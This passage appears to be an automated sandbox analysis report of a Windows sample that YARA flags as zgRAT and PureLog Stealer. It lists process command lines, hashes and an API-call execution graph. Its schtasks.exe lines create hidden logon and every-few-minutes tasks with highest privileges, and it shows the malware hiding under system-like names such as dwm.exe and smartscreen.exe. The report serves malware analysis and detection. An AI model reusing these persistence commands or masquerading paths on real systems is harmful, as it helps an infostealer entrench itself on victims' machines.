                                                            Commandline:schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQ" /sc ONLOGON /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:25
                                                            Start time:17:47:38
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "iEIWJugOSvvEyboGDFYpQi" /sc MINUTE /mo 8 /tr "'C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:26
                                                            Start time:17:47:38
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "PortsessionsvcP" /sc MINUTE /mo 9 /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:27
                                                            Start time:17:47:38
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "Portsessionsvc" /sc ONLOGON /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:28
                                                            Start time:17:47:38
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:schtasks.exe /create /tn "PortsessionsvcP" /sc MINUTE /mo 9 /tr "'C:\ComproviderComponentIntocommon\Portsessionsvc.exe'" /rl HIGHEST /f
                                                            Imagebase:0x7ff76f990000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:29
                                                            Start time:17:47:39
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jdisWpWAyY.bat"
                                                            Imagebase:0x7ff6b3500000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:30
                                                            Start time:17:47:39
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:31
                                                            Start time:17:47:39
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\chcp.com
                                                            Wow64 process (32bit):false
                                                            Commandline:chcp 65001
                                                            Imagebase:0x7ff707f00000
                                                            File size:14'848 bytes
                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:32
                                                            Start time:17:47:39
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\PING.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:ping -n 10 localhost
                                                            Imagebase:0x7ff781210000
                                                            File size:22'528 bytes
                                                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:33
                                                            Start time:17:47:39
                                                            Start date:28/12/2024
                                                            Path:C:\ComproviderComponentIntocommon\ctfmon.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\ComproviderComponentIntocommon\ctfmon.exe
                                                            Imagebase:0x810000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComproviderComponentIntocommon\ctfmon.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComproviderComponentIntocommon\ctfmon.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 78%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:34
                                                            Start time:17:47:39
                                                            Start date:28/12/2024
                                                            Path:C:\ComproviderComponentIntocommon\ctfmon.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\ComproviderComponentIntocommon\ctfmon.exe
                                                            Imagebase:0xb00000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:35
                                                            Start time:17:47:40
                                                            Start date:28/12/2024
                                                            Path:C:\Recovery\dwm.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Recovery\dwm.exe
                                                            Imagebase:0x7ff72bec0000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\dwm.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\dwm.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 78%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:36
                                                            Start time:17:47:40
                                                            Start date:28/12/2024
                                                            Path:C:\Recovery\dwm.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Recovery\dwm.exe
                                                            Imagebase:0x5e0000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:37
                                                            Start time:17:47:40
                                                            Start date:28/12/2024
                                                            Path:C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                                            Imagebase:0x110000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 78%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:38
                                                            Start time:17:47:40
                                                            Start date:28/12/2024
                                                            Path:C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                                            Imagebase:0xe30000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:39
                                                            Start time:17:47:40
                                                            Start date:28/12/2024
                                                            Path:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            Imagebase:0x110000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:40
                                                            Start time:17:47:40
                                                            Start date:28/12/2024
                                                            Path:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            Imagebase:0x210000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:41
                                                            Start time:17:47:40
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\Resources\Themes\smartscreen.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Resources\Themes\smartscreen.exe
                                                            Imagebase:0xda0000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Resources\Themes\smartscreen.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Resources\Themes\smartscreen.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 78%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:42
                                                            Start time:17:47:40
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\Resources\Themes\smartscreen.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Resources\Themes\smartscreen.exe
                                                            Imagebase:0x9d0000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:43
                                                            Start time:17:47:48
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\Resources\Themes\smartscreen.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Resources\Themes\smartscreen.exe"
                                                            Imagebase:0x690000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:44
                                                            Start time:17:47:49
                                                            Start date:28/12/2024
                                                            Path:C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe"
                                                            Imagebase:0x2e0000
                                                            File size:1'688'064 bytes
                                                            MD5 hash:5231D0FCCC4F24F5B3D76964B3513636
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:45
                                                            Start time:17:47:50
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ycxw1CWDXu.bat"
                                                            Imagebase:0x7ff6b3500000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:46
                                                            Start time:17:47:50
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:47
                                                            Start time:17:47:50
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\chcp.com
                                                            Wow64 process (32bit):false
                                                            Commandline:chcp 65001
                                                            Imagebase:0x7ff707f00000
                                                            File size:14'848 bytes
                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:9.5%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:9.4%
                                                              Total number of Nodes:1472
                                                              Total number of Limit Nodes:43
                                                              execution_graph 25279 43a440 GdipCloneImage GdipAlloc 25341 443a40 5 API calls CatchGuardHandler 25357 451f40 CloseHandle 23520 43e44b 23521 43e3f4 23520->23521 23521->23520 23523 43e85d 23521->23523 23549 43e5bb 23523->23549 23525 43e86d 23526 43e8ca 23525->23526 23538 43e8ee 23525->23538 23527 43e7fb DloadReleaseSectionWriteAccess 6 API calls 23526->23527 23528 43e8d5 RaiseException 23527->23528 23529 43eac3 23528->23529 23529->23521 23530 43e966 LoadLibraryExA 23531 43e9c7 23530->23531 23532 43e979 GetLastError 23530->23532 23533 43e9d2 FreeLibrary 23531->23533 23537 43e9d9 23531->23537 23534 43e9a2 23532->23534 23535 43e98c 23532->23535 23533->23537 23540 43e7fb DloadReleaseSectionWriteAccess 6 API calls 23534->23540 23535->23531 23535->23534 23536 43ea37 GetProcAddress 23539 43ea47 GetLastError 23536->23539 23545 43ea95 23536->23545 23537->23536 23537->23545 23538->23530 23538->23531 23538->23537 23538->23545 23541 43ea5a 23539->23541 23543 43e9ad RaiseException 23540->23543 23544 43e7fb DloadReleaseSectionWriteAccess 6 API calls 23541->23544 23541->23545 23543->23529 23546 43ea7b RaiseException 23544->23546 23558 43e7fb 23545->23558 23547 43e5bb ___delayLoadHelper2@8 6 API calls 23546->23547 23548 43ea92 23547->23548 23548->23545 23550 43e5c7 23549->23550 23551 43e5ed 23549->23551 23566 43e664 23550->23566 23551->23525 23553 43e5cc 23554 43e5e8 23553->23554 23569 43e78d 23553->23569 23574 43e5ee GetModuleHandleW GetProcAddress GetProcAddress 23554->23574 23557 43e836 23557->23525 23559 43e82f 23558->23559 23560 43e80d 23558->23560 23559->23529 23561 43e664 DloadReleaseSectionWriteAccess 3 API calls 23560->23561 23562 43e812 23561->23562 23563 43e82a 23562->23563 23564 43e78d DloadProtectSection 3 API calls 23562->23564 23577 43e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23563->23577 23564->23563 23575 43e5ee GetModuleHandleW GetProcAddress GetProcAddress 23566->23575 23568 43e669 23568->23553 23570 43e7a2 DloadProtectSection 23569->23570 23571 43e7dd VirtualProtect 23570->23571 23572 43e7a8 23570->23572 23576 43e6a3 VirtualQuery GetSystemInfo 23570->23576 23571->23572 23572->23554 23574->23557 23575->23568 23576->23571 23577->23559 25281 43e455 14 API calls ___delayLoadHelper2@8 23614 43cd58 23615 43ce22 23614->23615 23621 43cd7b _wcschr 23614->23621 23630 43c793 _wcslen _wcsrchr 23615->23630 23642 43d78f 23615->23642 23618 43d40a 23620 431fbb CompareStringW 23620->23621 23621->23615 23621->23620 23622 43ca67 SetWindowTextW 23622->23630 23627 43c855 SetFileAttributesW 23628 43c90f GetFileAttributesW 23627->23628 23640 43c86f _abort _wcslen 23627->23640 23628->23630 23632 43c921 DeleteFileW 23628->23632 23630->23618 23630->23622 23630->23627 23633 43cc31 GetDlgItem SetWindowTextW SendMessageW 23630->23633 23636 43cc71 SendMessageW 23630->23636 23641 431fbb CompareStringW 23630->23641 23664 43b314 23630->23664 23668 43a64d GetCurrentDirectoryW 23630->23668 23670 42a5d1 6 API calls 23630->23670 23671 42a55a FindClose 23630->23671 23672 43b48e 76 API calls 2 library calls 23630->23672 23673 443e3e 23630->23673 23632->23630 23634 43c932 23632->23634 23633->23630 23635 424092 _swprintf 51 API calls 23634->23635 23637 43c952 GetFileAttributesW 23635->23637 23636->23630 23637->23634 23638 43c967 MoveFileW 23637->23638 23638->23630 23639 43c97f MoveFileExW 23638->23639 23639->23630 23640->23628 23640->23630 23669 42b991 51 API calls 3 library calls 23640->23669 23641->23630 23644 43d799 _abort _wcslen 23642->23644 23643 43d9c0 23648 43d9e7 23643->23648 23650 43d9de ShowWindow 23643->23650 23644->23643 23645 43d8a5 23644->23645 23644->23648 23689 431fbb CompareStringW 23644->23689 23686 42a231 23645->23686 23648->23630 23650->23648 23652 43d925 23691 43dc3b 6 API calls 23652->23691 23653 43d97b CloseHandle 23654 43d989 23653->23654 23655 43d994 23653->23655 23692 431fbb CompareStringW 23654->23692 23655->23643 23656 43d8d1 23656->23648 23656->23652 23656->23653 23658 43d91b ShowWindow 23656->23658 23658->23652 23660 43d93d 23660->23653 23661 43d950 GetExitCodeProcess 23660->23661 23661->23653 23662 43d963 23661->23662 23662->23653 23665 43b31e 23664->23665 23666 43b3f0 ExpandEnvironmentStringsW 23665->23666 23667 43b40d 23665->23667 23666->23667 23667->23630 23668->23630 23669->23640 23670->23630 23671->23630 23672->23630 23674 448e54 23673->23674 23675 448e61 23674->23675 23676 448e6c 23674->23676 23707 448e06 23675->23707 23678 448e74 23676->23678 23685 448e7d _unexpected 23676->23685 23679 448dcc _free 20 API calls 23678->23679 23683 448e69 23679->23683 23680 448ea7 HeapReAlloc 23680->23683 23680->23685 23681 448e82 23714 4491a8 20 API calls __dosmaperr 23681->23714 23683->23630 23685->23680 23685->23681 23715 447a5e 7 API calls 2 library calls 23685->23715 23693 42a243 23686->23693 23689->23645 23690 42b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23690->23656 23691->23660 23692->23655 23701 43ec50 23693->23701 23696 42a261 23703 42bb03 23696->23703 23697 42a23a 23697->23656 23697->23690 23699 42a275 23699->23697 23700 42a279 GetFileAttributesW 23699->23700 23700->23697 23702 42a250 GetFileAttributesW 23701->23702 23702->23696 23702->23697 23704 42bb10 _wcslen 23703->23704 23705 42bbb8 GetCurrentDirectoryW 23704->23705 23706 42bb39 _wcslen 23704->23706 23705->23706 23706->23699 23708 448e44 23707->23708 23712 448e14 _unexpected 23707->23712 23717 4491a8 20 API calls __dosmaperr 23708->23717 23709 448e2f RtlAllocateHeap 23711 448e42 23709->23711 23709->23712 23711->23683 23712->23708 23712->23709 23716 447a5e 7 API calls 2 library calls 23712->23716 23714->23683 23715->23685 23716->23712 23717->23711 25282 43c793 107 API calls 5 library calls 25359 447f6e 52 API calls 3 library calls 25343 448268 55 API calls _free 25360 421f72 128 API calls __EH_prolog 25283 43a070 10 API calls 25344 43b270 99 API calls 24659 429a74 24660 429a7e 24659->24660 24661 429b9d SetFilePointer 24660->24661 24663 42981a 79 API calls 24660->24663 24664 429ab1 24660->24664 24665 429b79 24660->24665 24662 429bb6 GetLastError 24661->24662 24661->24664 24662->24664 24663->24665 24665->24661 25285 421075 84 API calls 24666 429f7a 24667 429f88 24666->24667 24668 429f8f 24666->24668 24669 429f9c GetStdHandle 24668->24669 24676 429fab 24668->24676 24669->24676 24670 42a003 WriteFile 24670->24676 24671 429fd4 WriteFile 24672 429fcf 24671->24672 24671->24676 24672->24671 24672->24676 24674 42a095 24678 426e98 77 API calls 24674->24678 24676->24667 24676->24670 24676->24671 24676->24672 24676->24674 24677 426baa 78 API calls 24676->24677 24677->24676 24678->24667 25287 43a400 GdipDisposeImage GdipFree 25345 43d600 70 API calls 25288 446000 QueryPerformanceFrequency QueryPerformanceCounter 25320 442900 6 API calls 4 library calls 25346 44f200 51 API calls 25362 44a700 21 API calls 25363 421710 86 API calls 25323 43ad10 73 API calls 25347 43c220 93 API calls _swprintf 25293 44f421 21 API calls __vsnwprintf_l 25294 421025 29 API calls 25325 44b4ae 27 API calls CatchGuardHandler 25326 43f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25366 43ff30 LocalFree 25152 44bb30 25153 44bb39 25152->25153 25154 44bb42 25152->25154 25156 44ba27 25153->25156 25157 4497e5 _unexpected 38 API calls 25156->25157 25158 44ba34 25157->25158 25176 44bb4e 25158->25176 25160 44ba3c 25185 44b7bb 25160->25185 25163 44ba53 25163->25154 25164 448e06 __vsnwprintf_l 21 API calls 25165 44ba64 25164->25165 25175 44ba96 25165->25175 25192 44bbf0 25165->25192 25167 448dcc _free 20 API calls 25167->25163 25169 44ba91 25202 4491a8 20 API calls __dosmaperr 25169->25202 25170 44baae 25172 44bada 25170->25172 25173 448dcc _free 20 API calls 25170->25173 25172->25175 25203 44b691 26 API calls 25172->25203 25173->25172 25175->25167 25177 44bb5a ___scrt_is_nonwritable_in_current_image 25176->25177 25178 4497e5 _unexpected 38 API calls 25177->25178 25183 44bb64 25178->25183 25180 44bbe8 _abort 25180->25160 25183->25180 25184 448dcc _free 20 API calls 25183->25184 25204 448d24 38 API calls _abort 25183->25204 25205 44ac31 EnterCriticalSection 25183->25205 25206 44bbdf LeaveCriticalSection _abort 25183->25206 25184->25183 25186 444636 __cftof 38 API calls 25185->25186 25187 44b7cd 25186->25187 25188 44b7dc GetOEMCP 25187->25188 25189 44b7ee 25187->25189 25190 44b805 25188->25190 25189->25190 25191 44b7f3 GetACP 25189->25191 25190->25163 25190->25164 25191->25190 25193 44b7bb 40 API calls 25192->25193 25194 44bc0f 25193->25194 25196 44bc60 IsValidCodePage 25194->25196 25199 44bc16 25194->25199 25201 44bc85 _abort 25194->25201 25195 43fbbc CatchGuardHandler 5 API calls 25197 44ba89 25195->25197 25198 44bc72 GetCPInfo 25196->25198 25196->25199 25197->25169 25197->25170 25198->25199 25198->25201 25199->25195 25207 44b893 GetCPInfo 25201->25207 25202->25175 25203->25175 25205->25183 25206->25183 25208 44b977 25207->25208 25209 44b8cd 25207->25209 25211 43fbbc CatchGuardHandler 5 API calls 25208->25211 25217 44c988 25209->25217 25213 44ba23 25211->25213 25213->25199 25216 44ab78 __vsnwprintf_l 43 API calls 25216->25208 25218 444636 __cftof 38 API calls 25217->25218 25219 44c9a8 MultiByteToWideChar 25218->25219 25221 44c9e6 25219->25221 25228 44ca7e 25219->25228 25223 448e06 __vsnwprintf_l 21 API calls 25221->25223 25229 44ca07 _abort __vsnwprintf_l 25221->25229 25222 43fbbc CatchGuardHandler 5 API calls 25224 44b92e 25222->25224 25223->25229 25231 44ab78 25224->25231 25225 44ca78 25236 44abc3 20 API calls _free 25225->25236 25227 44ca4c MultiByteToWideChar 25227->25225 25230 44ca68 GetStringTypeW 25227->25230 25228->25222 25229->25225 25229->25227 25230->25225 25232 444636 __cftof 38 API calls 25231->25232 25233 44ab8b 25232->25233 25237 44a95b 25233->25237 25236->25228 25238 44a976 __vsnwprintf_l 25237->25238 25239 44a99c MultiByteToWideChar 25238->25239 25240 44a9c6 25239->25240 25241 44ab50 25239->25241 25246 448e06 __vsnwprintf_l 21 API calls 25240->25246 25248 44a9e7 __vsnwprintf_l 25240->25248 25242 43fbbc CatchGuardHandler 5 API calls 25241->25242 25243 44ab63 25242->25243 25243->25216 25244 44aa30 MultiByteToWideChar 25245 44aa9c 25244->25245 25247 44aa49 25244->25247 25273 44abc3 20 API calls _free 25245->25273 25246->25248 25264 44af6c 25247->25264 25248->25244 25248->25245 25252 44aa73 25252->25245 25255 44af6c __vsnwprintf_l 11 API calls 25252->25255 25253 44aaab 25254 448e06 __vsnwprintf_l 21 API calls 25253->25254 25258 44aacc __vsnwprintf_l 25253->25258 25254->25258 25255->25245 25256 44ab41 25272 44abc3 20 API calls _free 25256->25272 25258->25256 25259 44af6c __vsnwprintf_l 11 API calls 25258->25259 25260 44ab20 25259->25260 25260->25256 25261 44ab2f WideCharToMultiByte 25260->25261 25261->25256 25262 44ab6f 25261->25262 25274 44abc3 20 API calls _free 25262->25274 25265 44ac98 _unexpected 5 API calls 25264->25265 25266 44af93 25265->25266 25268 44af9c 25266->25268 25275 44aff4 10 API calls 3 library calls 25266->25275 25270 43fbbc CatchGuardHandler 5 API calls 25268->25270 25269 44afdc LCMapStringW 25269->25268 25271 44aa60 25270->25271 25271->25245 25271->25252 25271->25253 25272->25245 25273->25241 25274->25245 25275->25269 25297 44c030 GetProcessHeap 23393 43dec2 23394 43decf 23393->23394 23401 42e617 23394->23401 23402 42e627 23401->23402 23413 42e648 23402->23413 23405 424092 23436 424065 23405->23436 23408 43b568 PeekMessageW 23409 43b583 GetMessageW 23408->23409 23410 43b5bc 23408->23410 23411 43b599 IsDialogMessageW 23409->23411 23412 43b5a8 TranslateMessage DispatchMessageW 23409->23412 23411->23410 23411->23412 23412->23410 23419 42d9b0 23413->23419 23416 42e645 23416->23405 23417 42e66b LoadStringW 23417->23416 23418 42e682 LoadStringW 23417->23418 23418->23416 23424 42d8ec 23419->23424 23421 42d9cd 23422 42d9e2 23421->23422 23432 42d9f0 26 API calls 23421->23432 23422->23416 23422->23417 23425 42d904 23424->23425 23431 42d984 _strncpy 23424->23431 23427 42d928 23425->23427 23433 431da7 WideCharToMultiByte 23425->23433 23428 42d959 23427->23428 23434 42e5b1 50 API calls __vsnprintf 23427->23434 23435 446159 26 API calls 3 library calls 23428->23435 23431->23421 23432->23422 23433->23427 23434->23428 23435->23431 23437 42407c __vswprintf_c_l 23436->23437 23440 445fd4 23437->23440 23443 444097 23440->23443 23444 4440d7 23443->23444 23445 4440bf 23443->23445 23444->23445 23447 4440df 23444->23447 23467 4491a8 20 API calls __dosmaperr 23445->23467 23469 444636 23447->23469 23448 4440c4 23468 449087 26 API calls _abort 23448->23468 23454 444167 23478 4449e6 51 API calls 3 library calls 23454->23478 23455 424086 SetDlgItemTextW 23455->23408 23458 4440cf 23460 43fbbc 23458->23460 23459 444172 23479 4446b9 20 API calls _free 23459->23479 23461 43fbc5 IsProcessorFeaturePresent 23460->23461 23462 43fbc4 23460->23462 23464 43fc07 23461->23464 23462->23455 23480 43fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23464->23480 23466 43fcea 23466->23455 23467->23448 23468->23458 23470 444653 23469->23470 23476 4440ef 23469->23476 23470->23476 23481 4497e5 GetLastError 23470->23481 23472 444674 23502 44993a 38 API calls __cftof 23472->23502 23474 44468d 23503 449967 38 API calls __cftof 23474->23503 23477 444601 20 API calls 2 library calls 23476->23477 23477->23454 23478->23459 23479->23458 23480->23466 23482 449807 23481->23482 23483 4497fb 23481->23483 23505 44b136 20 API calls 2 library calls 23482->23505 23504 44ae5b 11 API calls 2 library calls 23483->23504 23486 449801 23486->23482 23487 449850 SetLastError 23486->23487 23487->23472 23488 449813 23489 44981b 23488->23489 23512 44aeb1 11 API calls 2 library calls 23488->23512 23506 448dcc 23489->23506 23492 449830 23492->23489 23494 449837 23492->23494 23493 449821 23495 44985c SetLastError 23493->23495 23513 449649 20 API calls _unexpected 23494->23513 23514 448d24 38 API calls _abort 23495->23514 23498 449842 23500 448dcc _free 20 API calls 23498->23500 23501 449849 23500->23501 23501->23487 23501->23495 23502->23474 23503->23476 23504->23486 23505->23488 23507 448dd7 RtlFreeHeap 23506->23507 23511 448e00 __dosmaperr 23506->23511 23508 448dec 23507->23508 23507->23511 23515 4491a8 20 API calls __dosmaperr 23508->23515 23510 448df2 GetLastError 23510->23511 23511->23493 23512->23492 23513->23498 23515->23510 25327 43b5c0 100 API calls 25368 4377c0 118 API calls 25369 43ffc0 RaiseException _com_error::_com_error CallUnexpected 25348 4362ca 123 API calls __InternalCxxFrameHandler 25299 43f4d3 20 API calls 23579 43e1d1 14 API calls ___delayLoadHelper2@8 23581 43e2d7 23582 43e1db 23581->23582 23583 43e85d ___delayLoadHelper2@8 14 API calls 23582->23583 23583->23582 25371 44a3d0 21 API calls 2 library calls 25372 452bd0 VariantClear 23585 4210d5 23590 425abd 23585->23590 23591 425ac7 __EH_prolog 23590->23591 23597 42b505 23591->23597 23593 425ad3 23603 425cac GetCurrentProcess GetProcessAffinityMask 23593->23603 23598 42b50f __EH_prolog 23597->23598 23604 42f1d0 82 API calls 23598->23604 23600 42b521 23605 42b61e 